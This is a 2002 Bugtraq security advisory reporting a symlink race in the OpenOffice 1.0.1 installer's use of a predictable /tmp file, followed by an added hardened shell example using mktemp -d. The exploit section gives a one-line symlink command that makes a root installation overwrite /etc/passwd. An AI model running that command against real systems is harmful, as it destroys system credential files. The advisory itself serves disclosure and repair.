[27396] in bugtraq


OpenOffice 1.0.1 Race condition during installation.

daemon@ATHENA.MIT.EDU (Larry W. Cashdollar)
Fri Oct 11 13:15:00 2002

Date: Fri, 11 Oct 2002 09:51:22 -0400 (EDT)
From: "Larry W. Cashdollar" <lwc@vapid.ath.cx>
To: <bugtraq@securityfocus.com>
Message-ID: <20021011094925.E1481-100000@vapid.ath.cx>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

		 	Vapid Labs
                    Larry W. Cashdollar
			  9/9/02

Summary: OpenOffice 1.0.1 Race condition during installation can overwrite
system files.

Severity: Low

Description: A very simple and easy to exploit race condition exists during the
 installation of OpenOffice.  During this window a malicious user could create a
 symlink in /tmp and overwrite arbitrary files.

Exploit:

As a normal user:

lwc $ ln -s /etc/passwd /tmp/$USERNAME_autoresponse.conf

Where $USERNAME is the installer account name, probably root.

This will result in the password file being overwritten by the following part
of the install script:

# create the proper autoresponse file
cat << EOF > /tmp/${USER}_autoresponse.conf
[ENVIRONMENT]
INSTALLATIONMODE=$installtype
INSTALLATIONTYPE=STANDARD
DESTINATIONPATH=$prefix/$oo_home
OUTERPATH=
LOGFILE=
LANGUAGELIST=<LANGUAGE>

[JAVA]
JavaSupport=preinstalled_or_none

EOF

Fix:
    Create a directory under /tmp to work from, with restrictive permissions.

References:

http://www.openoffice.org/dev_docs/source/1.0.1/index.html

Larry W. Cashdollar
lwc@vapid.ath.cx
http://vapid.ath.cx
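
The fix described above, as an added shell example (not code from the OpenOffice installer or from the advisory's author): the response file is written inside a private directory created with mktemp -d instead of at a predictable path in /tmp. The function name write_autoresponse, the oo_install prefix and the arguments are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: hardened creation of the installer response file.
# write_autoresponse and the oo_install prefix are hypothetical names;
# only the file contents follow the fragment quoted in the advisory.

# Usage: conf=$(write_autoresponse INSTALLTYPE DESTPATH)
# Prints the path of the new response file; returns non-zero on failure.
# The body runs in a subshell so the umask change does not leak to the caller.
write_autoresponse() (
    installtype=$1
    destpath=$2

    # New files are created 0600, new directories 0700.
    umask 077

    # mktemp -d atomically creates a fresh directory with an unpredictable
    # name and fails if the path already exists, so a symlink planted in
    # /tmp beforehand is never followed.
    workdir=$(mktemp -d "${TMPDIR:-/tmp}/oo_install.XXXXXX") || exit 1

    # Only the installing user can create entries in $workdir, so this
    # fixed name is safe to open for writing.
    conf="$workdir/autoresponse.conf"

    cat > "$conf" <<EOF || exit 1
[ENVIRONMENT]
INSTALLATIONMODE=$installtype
INSTALLATIONTYPE=STANDARD
DESTINATIONPATH=$destpath
OUTERPATH=
LOGFILE=
LANGUAGELIST=<LANGUAGE>

[JAVA]
JavaSupport=preinstalled_or_none

EOF

    printf '%s\n' "$conf"
)
```

The caller should remove the directory containing the returned file once the installer has read it.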


